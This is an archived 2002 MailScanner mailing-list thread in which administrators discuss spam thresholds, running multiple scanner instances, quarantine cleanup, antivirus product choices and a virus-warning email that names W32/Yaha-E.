[208.38.40.183]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8DGHWr14690 for ; Fri, 13 Sep 2002 17:17:32 +0100 Received: from sankofasystems.com (localhost [127.0.0.1]) by sankofa01.sankofasystems.com (8.11.2/8.11.2) with ESMTP id g8DGCQd08617 for ; Fri, 13 Sep 2002 10:12:26 -0600 From: "Alfred Owusu" To: LISTSERV@JISCMAIL.AC.UK Reply-To: alfredo@sankofasystems.com Subject: SIGNOFF MAILSCANNER Date: Fri, 13 Sep 2002 10:12:26 -0600 Message-Id: <20020913161226.M38182@sankofasystems.com> In-Reply-To: <200209131551.g8DFpLd08290@sankofa01.sankofasystems.com> References: <200209131551.g8DFpLd08290@sankofa01.sankofasystems.com> X-Mailer: Open WebMail 1.71 20020827 X-OriginatingIP: 208.38.40.183 (alfredo@sankofasystems.com) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 X-MailScanner: Found to be clean From mailscanner at ecs.soton.ac.uk Fri Sep 13 17:06:05 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:38 2006 Subject: Feature request In-Reply-To: References: <200209131027.40066.ft@it.su.se> Message-ID: <5.1.0.14.2.20020913170545.04a2f628@imap.ecs.soton.ac.uk> Not quite sure what you mean when you say "HTML scripts" as opposed to "regular HTML". At 09:35 13/09/2002, you wrote: > >From some domains we get e-mail messages that contain regular message >text in HTML script format. > >In Outlook this show up as the funny scroll in every message. I am not >particularly fond of HTML scripts to say the least. > >Is there any way to convert these scripts to regular HTML or otherwise >harmless text? > >The stupid thing is that if you reply to such a message the script remains >in the message. > >Cheers! -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 13 17:05:11 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:38 2006 Subject: ANNOUNCE: Security release 3.22-14 In-Reply-To: <200209131027.40066.ft@it.su.se> References: <5.1.0.14.2.20020913081037.02e2d4a0@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020912223652.022cb290@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020913081037.02e2d4a0@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020913170437.02e27870@imap.ecs.soton.ac.uk> At 09:27 13/09/2002, you wrote: >On Friday 13 September 2002 09.11, Julian Field wrote: >... > > Once I'm sure the new release works. Testing 7,500 lines of code takes a > > little while... > >my suggestion is to let people willing to help you. Don't worry, I will. I just don't want to release any really blatant bugs. Someone might realise I'm not a programmer :-) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 13 17:08:13 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:38 2006 Subject: Feature Request In-Reply-To: Message-ID: <5.1.0.14.2.20020913170751.048a57a0@imap.ecs.soton.ac.uk> The new version leaves the orphaned files there, but will ignore any message which doesn't have a qf file. At 15:04 13/09/2002, you wrote: >Mqueue.in cleanup... Every now and then I find that performance starts >to lag and when I check into things, I find orphaned df files in >mqueue.in. Typically these are large files, like today there was 3meg >and 9.9meg I think mailscanner will still try processing these files at >every run even though they don't have an associated qf file. If you >just run virus scanning you may not notice it, but if using the >SpamChecks, you'll see the slow down in the form of mqueue.in backing >up. > >Yeh it might be good to figure out the cause of them but they are so far >and few between that it's not worth it. My guess is that maybe the df >is locked by sendmail because it's still receiving and mailscanner just >picks up the qf and sends it on. > >So the request is to have mailscanner delete the orphans if it happens >upon one. > >-=B -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 13 17:11:29 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:38 2006 Subject: [OT] Which f-secure product is f-prot? In-Reply-To: Message-ID: <5.1.0.14.2.20020913170840.04e22f50@imap.ecs.soton.ac.uk> Can I add a comment here that hopefully won't get me into too much trouble? F-Prot is a good product. F-Secure is not. F-Secure will silently ignore any file whose pathname is longer than 256 characters. They admit to that on their own web site. F-Secure will not scan any files whose name starts with a "." even when you use the "--dumb" option which is supposed to force scanning of all files. Personally I wouldn't touch F-Secure with a 10-foot barge pole, I think it is an absolute piece of rubbish. F-Prot on the other hand is a pretty good product (not quite as nice as Sophos as the output is hell to parse), but it does seem capable of working properly. So go to www.f-prot.com and not www.f-secure.com. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 13 17:15:33 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:38 2006 Subject: Selective spam filtering? In-Reply-To: <010501c25b40$01f408c0$6701a8c0@matthew> References: Message-ID: <5.1.0.14.2.20020913171404.02dfe798@imap.ecs.soton.ac.uk> At 17:09 13/09/2002, you wrote: > > I have been playing around with the whitelist, but I can't seem to figure > > out the best way to accomplish what I need. > > > > Basically I have a domain, somedomain.com, which has about 3000 email > > accounts on another mail server. Only about 100 of the accounts want spam > > filtering. From what I can see with the whitelist, I need to put 2990 To: > > accounts in the whitelist. I guess it could be done, but it would be a > > management nightmare. > > > > Is there an easier way to just identify the 100 accounts as getting > > filtered, while leaving the other 2990 unfiltered. Thanks. > >I would be very interested in this too. To make it more complicated. I >would like to bounce all emails for everyone if they are in ORDB or SPAMcop >and only use SpamAssassin to tag messages for a select few. Spamassassin >falses too much Then set the threshold a bit higher. I use a threshold of 9 and there are virtually no false positives at all. > and many don't like it tagging there email. The new version will have an extra "X-MailScanner-SpamScore" header which will contain an "x" for each point of the SpamAssassin score. So then you could turn off the subject-line modification and let all the users set their own threshold by looking for a minimum-length strings of "x"s in the header. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Fri Sep 13 17:13:37 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:39 2006 Subject: Selective spam filtering? In-Reply-To: References: <5.1.0.14.2.20020913081115.04a9cb50@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020913171328.04a44c30@imap.ecs.soton.ac.uk> I'll have to think about that one... At 16:43 13/09/2002, you wrote: >I have been playing around with the whitelist, but I can't seem to figure >out the best way to accomplish what I need. > >Basically I have a domain, somedomain.com, which has about 3000 email >accounts on another mail server. Only about 100 of the accounts want spam >filtering. From what I can see with the whitelist, I need to put 2990 To: >accounts in the whitelist. I guess it could be done, but it would be a >management nightmare. > >Is there an easier way to just identify the 100 accounts as getting >filtered, while leaving the other 2990 unfiltered. Thanks. > >At 02:56 13/09/2002, you wrote: > >I am currently using mailscanner with spamassassin and sendmail. I am only > >using the spam feature to filter spam for specific domains that are hosted > >on other mail servers. Can I only spam filter for certain addresses in the > >domain, while letting everything else through? > > > >someone@somedomain.com gets filtered > >*@somedomain.com no filtering > > > >Is this possible with my config? > >Yes, the spam whitelist lets you do exactly this. Take a look at the sample >supplied spam.whitelist.conf file. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From jim at ENTROPHY-FREE.NET Fri Sep 13 18:45:12 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:39 2006 Subject: ANNOUNCE: Security release 3.22-14 In-Reply-To: <5.1.0.14.2.20020913170437.02e27870@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020913081037.02e2d4a0@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020912223652.022cb290@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020913081037.02e2d4a0@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020913170437.02e27870@imap.ecs.soton.ac.uk> Message-ID: <1031939113.1830.5.camel@wilowisp.dynetics.com> On Fri, 2002-09-13 at 11:05, Julian Field wrote: > At 09:27 13/09/2002, you wrote: > >On Friday 13 September 2002 09.11, Julian Field wrote: > >... > > > Once I'm sure the new release works. Testing 7,500 lines of code takes a > > > little while... > > > >my suggestion is to let people willing to help you. > > Don't worry, I will. I just don't want to release any really blatant bugs. > Someone might realise I'm not a programmer :-) > I've been through your Perl code, and and no one with any knowledge of Perl and email would ever have any doubt that you really are a programmer. I've been using Perl since day one and still had some "Wow!" moments on some of the more elegant constructs. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From jim at ENTROPHY-FREE.NET Fri Sep 13 18:49:59 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:39 2006 Subject: logging In-Reply-To: <5.1.0.14.2.20020913080850.04a1e008@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020912224819.0230ef68@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020912224819.0230ef68@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020913080850.04a1e008@imap.ecs.soton.ac.uk> Message-ID: <1031939400.1830.11.camel@wilowisp.dynetics.com> On Fri, 2002-09-13 at 02:09, Julian Field wrote: > At 23:32 12/09/2002, you wrote: > > > >If that sort of information was going to be logged, and I'm not sure if > >that is something that MailScanner ought to be doing, it would seem to > >me that it would make more sense to push the data into a file or a DB. > >Syslog isn't very flexible in its logging format and we are talking > >about a big growth in the log files. Seems to me that if it were going > >into a separate log file or a DB the results would be easier to parse > >and the maillog would remain more reasonable. The downside of that kind > >of additional logging is that it is going to slow down MailScanner and > >the code will be larger and more complex. > > Syslog already has hooks in it so that you can log to whatever file or > program you like, I'm not going to re-invent the wheel :) > Good point, it does keep the program logic a bit simpler. I guess my point was that for this particular type of logging some other method might be worth the increased complexity. It might be good to poll and see how valuable such an option would be. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From erich at OLYPEN.COM Fri Sep 13 19:19:36 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:39 2006 Subject: multiple mailscanner instances? Message-ID: OK, if I'm understanding the process correctly then one instance of sendmail listens and deposits mail in /var/spool/mqueue.in/ then mailscanner picks it up and scans it and deposits it in /var/spool/mqueue/ and then the other instance of sendmail picks it up and transfers it or hands it to procmail for delivery. So, would it not be possible to run multiple instances of mailscanner in order to increase the rate at which mail is picked up from /var/spool/mqueue.in? Would they step on each other? Would there be a performance benefit? Seems to me that on a dual processor machine it would. What's the /var/spool/MailScanner/incoming/ directory for? Eric From jim at ENTROPHY-FREE.NET Fri Sep 13 19:44:06 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:39 2006 Subject: multiple mailscanner instances? In-Reply-To: References: Message-ID: <1031942647.1830.42.camel@wilowisp.dynetics.com> On Fri, 2002-09-13 at 13:19, Eric H wrote: > OK, if I'm understanding the process correctly then one instance of > sendmail listens and deposits mail in /var/spool/mqueue.in/ then > mailscanner picks it up and scans it and deposits it in > /var/spool/mqueue/ and then the other instance of sendmail picks it > up and transfers it or hands it to procmail for delivery. > > So, would it not be possible to run multiple instances of mailscanner > in order to increase the rate at which mail is picked up from > /var/spool/mqueue.in? Would they step on each other? Would there > be a performance benefit? Seems to me that on a dual processor machine > it would. > Yes, it is possible to run more than one instance of MailScanner, but it's a little more complicated. What needs to happen in that case is that Sendmail is configured to drop inbound mail into mqueue.in. Then you need something else that picks up qf/df pairs from the input queue and distributes those to two or more MailScanner work queues. Each of the MailScanner instances has to have its own mailscanner.conf file, with the input queue pointed at one of the work queues. After scanning the results are placed in the sendmail output in the normal manner. Other things that require adjustment if you do this include the system init script that starts MailScanner and the check_mailscanner (or whatever local process does the same thing). -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From erich at OLYPEN.COM Sat Sep 14 01:22:49 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:39 2006 Subject: multiple mailscanner instances? In-Reply-To: <1031942647.1830.42.camel@wilowisp.dynetics.com> Message-ID: On Fri, 13 Sep 2002, Jim Levie wrote: > Yes, it is possible to run more than one instance of MailScanner, but > it's a little more complicated. What needs to happen in that case is > that Sendmail is configured to drop inbound mail into mqueue.in. Then > you need something else that picks up qf/df pairs from the input queue > and distributes those to two or more MailScanner work queues. Each of But that would cost another disk read/write. How exactly is MailScanner picking up qf/df pairs from the input queue that it can't cooperate with another instance? It seems to me that I can run sendmail -v -q several times and they don't walk on each other. Eric From jim at ENTROPHY-FREE.NET Sat Sep 14 01:44:20 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:39 2006 Subject: multiple mailscanner instances? In-Reply-To: References: Message-ID: <1031964261.1829.100.camel@wilowisp.dynetics.com> On Fri, 2002-09-13 at 19:22, Eric H wrote: > On Fri, 13 Sep 2002, Jim Levie wrote: > > > Yes, it is possible to run more than one instance of MailScanner, but > > it's a little more complicated. What needs to happen in that case is > > that Sendmail is configured to drop inbound mail into mqueue.in. Then > > you need something else that picks up qf/df pairs from the input queue > > and distributes those to two or more MailScanner work queues. Each of > > But that would cost another disk read/write. How exactly is MailScanner > picking up qf/df pairs from the input queue that it can't cooperate > with another instance? > Julian could provide the best analysis, but a quick read of the code said to me that it scans the input queue and identifies "Max Safe|Unsafe" sized batch of messages to process. The header data of those are written into MailScanners incoming directory (xxxxxxxxxx.header) and an internal list is constructed. Then it processes each message in that batch. The original copy of each message remains in the input queue until processing of that batch is complete. So running more than one instance on the same input queue and with the same work dirs isn't going to work, if I read the code correctly. At the very least you'd get duplicate delivery of at least some messages. Distributing the input queue to multiple processing queues is cheap, because it's just a "mv" of the qf/df pair. If you are interested I can clean up the queue mgmt code and document how I do it on a server that handles some 150-180K messages a day. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From erich at OLYPEN.COM Sat Sep 14 01:52:45 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:39 2006 Subject: Feature, maybe misfeature In-Reply-To: <20020914003637.GK12747@hoiho.nz.lemon-computing.com> Message-ID: On Sat, 14 Sep 2002, Nick Phillips wrote: > On Wed, Sep 11, 2002 at 03:45:22PM -0700, Eric H wrote: > > > What I haven't got written yet is a "spamsweeper" script which lazily runs > > in the background at a low 19 nice priority all the time, going through > > all of the .spam files and deleting any message older than x days. > > Such a thing already exists; I noticed it in the Debian package listing the > other week. I'm afraid I can't remember what it's called though. I found a couple that are at least close to what I'm looking for, including barrendero, garbmail and something else I can't remember, with a quick search on freshmeat.net. I'll see if I can find the Debian thing too. Eric From erich at OLYPEN.COM Sat Sep 14 01:58:22 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:39 2006 Subject: multiple mailscanner instances? In-Reply-To: <1031964261.1829.100.camel@wilowisp.dynetics.com> Message-ID: On Fri, 13 Sep 2002, Jim Levie wrote: > Distributing the input queue to multiple processing queues is cheap, > because it's just a "mv" of the qf/df pair. If you are interested I can True, provided the queues are on the same filesystem. > clean up the queue mgmt code and document how I do it on a server that > handles some 150-180K messages a day. I'd like to see that, I do a similar amount of mail and I'm worried my production box is going to bog down on me when I deploy MailScanner on it. Eric From jim at ENTROPHY-FREE.NET Sat Sep 14 02:13:53 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:39 2006 Subject: multiple mailscanner instances? In-Reply-To: References: Message-ID: <1031966033.21702.7.camel@chaos.entrophy-free.net> On Fri, 2002-09-13 at 19:58, Eric H wrote: > On Fri, 13 Sep 2002, Jim Levie wrote: > > > Distributing the input queue to multiple processing queues is cheap, > > because it's just a "mv" of the qf/df pair. If you are interested I can > > True, provided the queues are on the same filesystem. Right, but MailScanner already requires that the input and output queues be on the same file system. The space requirements are the same for multiple scanner queues as it is for the single instance configuration. > > > clean up the queue mgmt code and document how I do it on a server that > > handles some 150-180K messages a day. > > I'd like to see that, I do a similar amount of mail and I'm worried my > production box is going to bog down on me when I deploy MailScanner on it. > Sure, you betcha... It's not a lot of code and probably the docs won't be that big, so I can probably just post it here sometime this weekend. -- The instructions said to use Windows 98 or better, so I installed RedHat. From lbergman at ABI.TCONLINE.NET Sat Sep 14 03:10:22 2002 From: lbergman at ABI.TCONLINE.NET (Lewis Bergman) Date: Thu Jan 12 21:15:39 2006 Subject: Feature, maybe misfeature In-Reply-To: References: <20020914003637.GK12747@hoiho.nz.lemon-computing.com> Message-ID: <1036.65.170.190.179.1031969422.squirrel@www.abi.tconline.net> >> > What I haven't got written yet is a "spamsweeper" script which >> lazily runs in the background at a low 19 nice priority all the >> time, going through all of the .spam files and deleting any message >> older than x days. >> >> Such a thing already exists; I noticed it in the Debian package >> listing the other week. I'm afraid I can't remember what it's called >> though. > I made one when I was trying to learn Python. I use it to delete everything recursively in the quarantine dir older than ten days. You can do the same thing though with one line and "find". -- Lewis Bergman Texas Communications 4309 Maple ST. Abilene, TX 79602 915-695-6962 From jim at ENTROPHY-FREE.NET Sat Sep 14 03:49:46 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:39 2006 Subject: multiple mailscanner instances? In-Reply-To: <20020914020858.GC19193@hoiho.nz.lemon-computing.com> References: <1031942647.1830.42.camel@wilowisp.dynetics.com> <20020914020858.GC19193@hoiho.nz.lemon-computing.com> Message-ID: <1031971789.21702.20.camel@chaos.entrophy-free.net> On Fri, 2002-09-13 at 21:08, Nick Phillips wrote: > On Fri, Sep 13, 2002 at 05:22:49PM -0700, Eric H wrote: > > On Fri, 13 Sep 2002, Jim Levie wrote: > > > > > Yes, it is possible to run more than one instance of MailScanner, but > > > it's a little more complicated. What needs to happen in that case is > > > that Sendmail is configured to drop inbound mail into mqueue.in. Then > > > you need something else that picks up qf/df pairs from the input queue > > > and distributes those to two or more MailScanner work queues. Each of > > > > But that would cost another disk read/write. How exactly is MailScanner > > picking up qf/df pairs from the input queue that it can't cooperate > > with another instance? > > It's been on the 'to-do' list for ages, but only made it in in the V4 > redesign/rewrite. > > If you look at the mailscanner code, you will see that there are two areas > in which it needs to co-operate -- in picking messages out of the queue, > and in use of its working directory area. Given the v3 code, it was just > fiddly to get it all right, but it is now in v4. > Yep, that agrees with what I saw in the code. I considered a code mod to do it and after consideration decided that an external "queue splitter" and separate conf files and work areas was lots safer and lots less work. Obviously, we can't yet "see the design" of the V4 scanner, but I'm glad to hear that it takes care of this need. -- The instructions said to use Windows 98 or better, so I installed RedHat. From jim at ENTROPHY-FREE.NET Sat Sep 14 05:59:40 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:39 2006 Subject: multiple mailscanner instances? In-Reply-To: <20020914035024.GE19193@hoiho.nz.lemon-computing.com> References: <1031942647.1830.42.camel@wilowisp.dynetics.com> <20020914020858.GC19193@hoiho.nz.lemon-computing.com> <1031971789.21702.20.camel@chaos.entrophy-free.net> <20020914035024.GE19193@hoiho.nz.lemon-computing.com> Message-ID: <1031979580.21702.27.camel@chaos.entrophy-free.net> On Fri, 2002-09-13 at 22:50, Nick Phillips wrote: > On Fri, Sep 13, 2002 at 09:49:46PM -0500, Jim Levie wrote: > > > Obviously, we can't yet "see the design" of the V4 scanner, but I'm glad > > to hear that it takes care of this need. > > I suspect that is why it was 3x faster ;) Although I didn't notice how > many processes Julian used by default. > Ever since he mentioned the speed improvement I had wondered if the redesign included multiple scanner instances. I can see some places in the V3 version that I suspect could be improved and which would make it faster when large input queues are encountered, but I wouldn't expect to see a 3x change from just that. -- The instructions said to use Windows 98 or better, so I installed RedHat. From P.G.M.Peters at civ.utwente.nl Sat Sep 14 08:01:33 2002 From: P.G.M.Peters at civ.utwente.nl (Peter Peters) Date: Thu Jan 12 21:15:39 2006 Subject: [OT] Which f-secure product is f-prot? In-Reply-To: <20020914020204.GB19193@hoiho.nz.lemon-computing.com> References: <5.1.0.14.2.20020913170840.04e22f50@imap.ecs.soton.ac.uk> <20020914020204.GB19193@hoiho.nz.lemon-computing.com> Message-ID: <3jn5ousg764p0saj4qjis0dae0rsdo1061@4ax.com> On Sat, 14 Sep 2002 14:02:04 +1200, you wrote: >> F-Secure will silently ignore any file whose pathname is longer than 256 >> characters. > >Since it's based on F-Prot to a significant degree, has anyone tested F-Prot >for this? I have tested this with an existing file in the quarantine (I copied the virusinfected file to one with allmost 255 characters) and it accepted it. Filename plus directory was well over 256 characters. -- Peter Peters senior netwerkbeheerder, Centrum voor Informatievoorziening, Universiteit Twente, Postbus 217, 7500 AE Enschede telefoon: +31 53 489 2301, fax:+31 53 489 2383, http://www.utwente.nl/civ From jkf at ecs.soton.ac.uk Sat Sep 14 19:10:23 2002 From: jkf at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:39 2006 Subject: multiple mailscanner instances? In-Reply-To: Message-ID: On Fri, 13 Sep 2002, Eric H wrote: > OK, if I'm understanding the process correctly then one instance of > sendmail listens and deposits mail in /var/spool/mqueue.in/ then > mailscanner picks it up and scans it and deposits it in > /var/spool/mqueue/ and then the other instance of sendmail picks it > up and transfers it or hands it to procmail for delivery. > > So, would it not be possible to run multiple instances of mailscanner > in order to increase the rate at which mail is picked up from > /var/spool/mqueue.in? Would they step on each other? Would there > be a performance benefit? Seems to me that on a dual processor machine > it would. This is all in the new version, due out some time soon... As written at the moment (in version 3) they will stomp all over each other, so don't be tempted to try it :-) > What's the /var/spool/MailScanner/incoming/ directory for? It's where it unpacks all the attachments so the virus scanners can do their work. -- Jules jkf@ecs.soton.ac.uk From john at sme-ecom.co.uk Sun Sep 15 12:35:23 2002 From: john at sme-ecom.co.uk (John Walker) Date: Thu Jan 12 21:15:39 2006 Subject: Spamassassin with Cobalt Message-ID: <000001c25cac$00720d40$0200000a@mail> Hi all, Were looking to set up Spamassassin in conjunction with Mailscanner on a Cobalt Raq4i which currently has Perl version 5.005_03 installed. We understand that to run the current version of Spamassassin 2.4 you require Perl version 5.8. Were led to beleive that running 2.4 with 5.005_03 would cause major problems to our existing configuration. Has anybody set up the combination of Raq4i / SA 2.4 /Mailscanner and Perl 5.8 - if so any advice on the best way to go about this before we plunge into the abbys. Many thanks in advance for any assistance. John Walker SME-ECOM From roberto at MEUPROVEDOR.COM.BR Sun Sep 15 15:49:33 2002 From: roberto at MEUPROVEDOR.COM.BR (Roberto Campos) Date: Thu Jan 12 21:15:39 2006 Subject: Mailscanner and McAfee In-Reply-To: Message-ID: <000e01c25cc7$24a1b560$4c00a8c0@escritoriomundial.com.br> Hi, I've instaled Mailscanner with McAfee and when i run ./autoupdate it gives this error: McAfee update failed: cannot find the update file, at ./autoupdate line 93. Can somebody help me here? Thanks in advance. Roberto Campos _______________________________________________________________ Meu Provedor Tecnologias e Informatica ltda. Rua Camerino, 128 Gr. 302 - Centro Rio de Janeiro - RJ - CEP 20080-010 Tel.: 21 - 25181011 Fax: 21 - 25181911 From domeng at STII.DOST.GOV.PH Mon Sep 16 07:23:36 2002 From: domeng at STII.DOST.GOV.PH (Domingo Genaro P. Tamayo) Date: Thu Jan 12 21:15:39 2006 Subject: Virus on Email Server itself? In-Reply-To: <5.1.0.14.2.20020910115705.053d2b88@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020910090642.04ea1dc0@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020910115705.053d2b88@imap.ecs.soton.ac.uk> Message-ID: <1559.10.10.140.42.1032157416.squirrel@itdgate.stii.dost.gov.ph> Good Day Im just wondering why do our MAILER-DEAMON sends a virus infected email. Here's a sample email sent by Mailscanner. Is it possible that anti-virus engine doesn't clean that infected email? **START OF EMAIL****** Subject: Warning: E-mail viruses detected View Full Header View Printable Version From: "STII Mail Scanner" Date: Sat, September 14, 2002 5:36 pm To: Priority: Normal Our virus detector has just been triggered by a message you sent:- To: Subject: Undelivered Mail Returned to Sender -New Text Document Date: Sat Sep 14 17:36:13 2002 Any infected parts of the message have not been delivered. This message is simply to warn you that your computer system may have a virus present and should be checked. The virus detector said this about the message: Report: >>> Virus 'W32/Yaha-E' found in file ./g8E9YlCZ019838/New Text Document.jpg.pifShortcuts to MS-Dos programs are very dangerous in email (New Text Document.jpg.pif) ------------------------------------- STII E-mail Virus Protection Service postmaster@stii.dost.gov.ph **END OF EMAIL****** Thanks and more power to Mailscanner. Domingo Genaro P. Tamayo SRS-I (STII-DOST PH) From eljl at I-SNAPINTERNET.COM Mon Sep 16 07:22:31 2002 From: eljl at I-SNAPINTERNET.COM (Eddie Javier) Date: Thu Jan 12 21:15:39 2006 Subject: mime-tools-patch2.txt missing Message-ID: <200209160622.g8G6MVr06551@ori.rl.ac.uk> Hello, I'm trying to update the MIME-Tools package, but only the first patch is available. Thanks, Ed From eljl at I-SNAPINTERNET.COM Mon Sep 16 07:54:51 2002 From: eljl at I-SNAPINTERNET.COM (Eddie Javier) Date: Thu Jan 12 21:15:39 2006 Subject: mime-tools-patch2.txt missing Message-ID: <200209160654.g8G6sor08203@ori.rl.ac.uk> Please disregard. I found it inside the new MailScanner package. The link from the website is still broken though. =) From glynn at MAKATI.TECHSQUARE.COM Mon Sep 16 09:29:57 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:39 2006 Subject: Virus on Email Server itself? References: <5.1.0.14.2.20020910090642.04ea1dc0@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020910115705.053d2b88@imap.ecs.soton.ac.uk> <1559.10.10.140.42.1032157416.squirrel@itdgate.stii.dost.gov.ph> Message-ID: <011501c25d5b$3f7d2b50$8201a8c0@proaccessph.com> the mailscanner informed you that there a virus in one of your emails. if you look at the attachments caught by mailscanner, its a double extensions so virus scanner doesnt clean it. it only a rule of mailscanner. cheers --- Glynn --- ----- Original Message ----- From: "Domingo Genaro P. Tamayo" To: Sent: Monday, September 16, 2002 2:23 PM Subject: Virus on Email Server itself? > Good Day > Im just wondering why do our MAILER-DEAMON sends a virus infected email. > Here's a sample email sent by Mailscanner. Is it possible that anti-virus > engine doesn't clean that infected email? > **START OF EMAIL****** > Subject: Warning: E-mail viruses detected View Full Header > View Printable Version > From: "STII Mail Scanner" > Date: Sat, September 14, 2002 5:36 pm > To: > Priority: Normal > > Our virus detector has just been triggered by a message you sent:- > To: > Subject: Undelivered Mail Returned to Sender -New Text Document > Date: Sat Sep 14 17:36:13 2002 > Any infected parts of the message have not been delivered. > > This message is simply to warn you that your computer system may have a > virus present and should be checked. > > The virus detector said this about the message: > Report: >>> Virus 'W32/Yaha-E' found in file ./g8E9YlCZ019838/New Text > Document.jpg.pifShortcuts to MS-Dos programs are very dangerous in email (New Text > Document.jpg.pif) > > ------------------------------------- > STII E-mail Virus Protection Service > postmaster@stii.dost.gov.ph > > **END OF EMAIL****** > > Thanks and more power to Mailscanner. > > Domingo Genaro P. Tamayo > SRS-I > (STII-DOST PH) > From domeng at STII.DOST.GOV.PH Mon Sep 16 10:51:19 2002 From: domeng at STII.DOST.GOV.PH (Domingo Genaro P. Tamayo) Date: Thu Jan 12 21:15:39 2006 Subject: Virus on Email Server itself? In-Reply-To: <011501c25d5b$3f7d2b50$8201a8c0@proaccessph.com> References: <5.1.0.14.2.20020910090642.04ea1dc0@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020910115705.053d2b88@imap.ecs.soton.ac.uk> <1559.10.10.140.42.1032157416.squirrel@itdgate.stii.dost.gov.ph> <011501c25d5b$3f7d2b50$8201a8c0@proaccessph.com> Message-ID: <1960.202.90.141.134.1032169879.squirrel@itdgate.stii.dost.gov.ph> You mean MailScanner includes the infected files to the warning mail sent to the sender of the infected files? Ok. I guess I have to go through the conf files again. Thanks. Im just worried my AV doesn't work anymore. =) Regards, Domingo Genaro Tamayo > the mailscanner informed you that there a virus in one of your emails. > if you look at the attachments caught by mailscanner, its a double > extensions so virus scanner doesnt clean it. it only a rule of > mailscanner. > > cheers > --- Glynn --- > > > > ----- Original Message ----- > Wrom: JVTLBXFGGMEPYOQKEDOTWFAOBUZXUWLSZLKBRNVWWCUFPEGAUTFJ > To: > Sent: Monday, September 16, 2002 2:23 PM > Subject: Virus on Email Server itself? > > >> Good Day >> Im just wondering why do our MAILER-DEAMON sends a virus infected >> email. Here's a sample email sent by Mailscanner. Is it possible that >> anti-virus engine doesn't clean that infected email? >> **START OF EMAIL****** >> Subject: Warning: E-mail viruses detected View Full Header >> View Printable Version >> Wrom: MVRESKPNKMBIPBARHDMNNSKVFVWRKJVZCMHVIBGDADRZFSQHY >> Date: Sat, September 14, 2002 5:36 pm >> To: >> Priority: Normal >> 